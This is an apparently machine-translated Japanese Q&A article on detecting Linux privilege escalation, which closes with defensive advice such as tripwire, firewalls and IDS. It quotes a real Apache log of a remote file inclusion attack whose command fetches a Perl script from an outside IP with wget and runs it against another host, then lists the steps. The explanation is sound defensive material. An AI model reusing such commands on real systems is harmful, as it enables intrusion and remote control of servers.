GNU/Linux >> Linux の 問題 >  >> Linux

権限昇格の検出?

エクスプロイトは、その性質上、検出されないように努めています。そのため、ほとんどのエクスプロイトは、少なくとも最初は、通常の手段でシステムに侵入することはありません。彼らは通常、バッファ オーバーフローのようなものを使用して、システムにアクセスします。

バッファ オーバーフロー

このスタイルの攻撃は、ユーザーからの入力を取得しようとしているアプリケーションの一部を探します。 Web ページと、これらのテキスト ボックスに情報を入力して情報を提供する必要があるさまざまなテキスト ボックスについて考えてみてください。これらの各テキスト ボックスは、攻撃者の潜在的なエントリ ポイントです。

朗報:

  • これらの攻撃のほとんどはルート アクセス権を取得するのではなく、ウェブ サーバー専用に設定されたユーザー アカウントへのアクセスを取得しているため、通常、アクセスはウェブ サーバーのファイルと機能のみに制限されています。
  • 攻撃者の侵入は、多くの分野でかなりの痕跡を残しています。
    • ファイアウォール ログ
    • ウェブサーバーのログ
    • その他の潜在的なセキュリティ ツール ログ

悪いニュース:

  • 彼らはシステムにアクセスできるようになったので、さらに侵入を試みるための橋頭堡を手に入れました。
  • ログ。はい、ログの分析には時間がかかり、エラーが発生しやすいため、ほとんどの場合、侵入は数週間、数か月、または数年間検出されません。

root ログインの検出

ほとんどのシステムはルート ログインを許可しないように設計されているため、この攻撃ベクトルは実際には問題になりません。ほとんどの攻撃は、他の下位レベルのアカウントへのアクセスを取得し、システムに橋頭堡を確立した後、追加の脆弱性を見つけて活用します。

例 #1:

攻撃者は、以下を実行することで root アクセスを取得できます:

<オール>
  • テキスト ボックスを介したフォームからのユーザー入力を処理する脆弱な Web ページを見つけて、システムの Web サーバー アカウントに侵入する
  • ウェブ サーバー アカウントへのアクセスが達成されたら、ウェブ サーバーのアカウントを介してシェル アクセスを取得するか、ウェブ サーバー アカウントを取得して、あなたに代わってコマンドを実行します。
  • コマンド ls などのツールのこの特定のシステムのバージョンに弱点があることを確認します .
  • ツールのオーバーフロー ls root アカウントへのアクセスを取得します。

    • 例 #2:

    攻撃者は、システムを完全に制御することに興味さえないかもしれません。ほとんどの侵入者は、他の用途の「スレーブ」として使用されるシステムを収集することにのみ関心があります。多くの場合、攻撃者は自分のソフトウェアをシステムにインストールしてシステムを使用できるようにすることだけに関心があり、システムを完全に制御することさえできません。

    <オール>
  • 特定の Web サイトが webapp X を利用可能にしたことを確認します。攻撃者は、webapp X に、webapp X がユーザーに画像ファイルのアップロードを許可する脆弱性があることを知っています。
  • 攻撃者は CMD.gif というファイルを用意します そしてアップロードします。たとえば、フォーラム サイトにあるユーザーのアバター画像かもしれません。しかし CMD.gif 画像ではなく、実際には CMD.gif という名前のプログラムです .
  • 攻撃者が「画像」をフォーラム サイトにアップロードします。
  • 今度は、攻撃者が Web アプリケーション X を「だまして」、自分の「イメージ」を実行させます。
  • 攻撃者は自分のブラウザで webapp X を呼び出しますが、webapp X の作成者が想像もしなかった方法で呼び出します。また、許可しないように Web アプリケーション X を設計したわけでもありません。

    • そのような攻撃のウェブ サーバー ログ ファイル 

    201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
  "GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
  &cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
  %2072.36.21.183%2021 HTTP/1.1" 200

    注: OSSEC.net 提供の Apache Web サーバーからのサンプル ログ。

    ここで、攻撃者は CMD.gif を実行するために webapp X (index.php) を取得しています。 これにより、次のことが可能になります:

    <オール>
  • cd /tmp
  • wget http://72.36.254.26/~fanta/dc.txt
  • perl dc.txt 72.36.21.183 21

    • そこで、彼らは webapp X をだましてディレクトリを /tmp に変更させました 、ファイルをダウンロード、dc.txt

    「侵害された」サーバーの無効化

    エクスプロイトを「検出」したサーバーをシャットダウンできるという考えは良い試みですが、いくつかの理由でうまくいきません。

    <オール>
  • 攻撃者が最初のシステムに侵入できれば、おそらく 2 番目のシステムにも侵入できます。
  • ほとんどのシステムは、本質的に互いのクローンです。保守が容易であり、物事をシンプルに (同じように) 維持することは、IT とコンピューターのほとんどの特徴です。
  • 構成が異なるということは、システムを維持するための作業が増えることを意味し、間違いを犯す機会が増えることを意味します。これは通常、そもそも脆弱性につながるものです。
  • 攻撃者の目的は侵入ではなく、サービスへのアクセスを拒否しようとしている可能性があります。これはサービス拒否 (DoS) と呼ばれます。

    • ダメージを抑えようとする

    延々と続けることもできますが、一般的に、システムの保護に関しては、いくつかのリソースを利用できます.

    • tripwire などのツールを使用して、システムのファイル システムの変更を検出する
    • ファイアウォール - すべてに完全にアクセスするのではなく、必要な場合にのみ明示的に許可されるようにアクセスを制限します。
    • ツールを使用してログ ファイルを分析し、異常を検出する
    • パッチを適用してシステムを最新の状態に保つ
    • 露出を制限する - システムに必要なソフトウェアのみをインストールします - gcc が必要ない場合 コンパイラがインストールされていますが、インストールしないでください。
    • IDS - 侵入検知ソフトウェア

    Linux

    1. 安いウェブホスティング

    2. .htaccessを介した簡単なWebサイトのリダイレクト

    3. passwd ファイルを使用した権限昇格

    1. ApacheWebサーバーを構成する方法

    2. sudo と .profile/.bashrc は簡単な権限昇格を有効にしますか?

    3. Linux システムで Intel の権限昇格の脆弱性を検出して軽減する方法 (CVE-2017-5689)?

    1. ApacheWebサーバーのキープアライブのチューニング

    2. Web 3.0とは何ですか?

    3. Vhostsの基本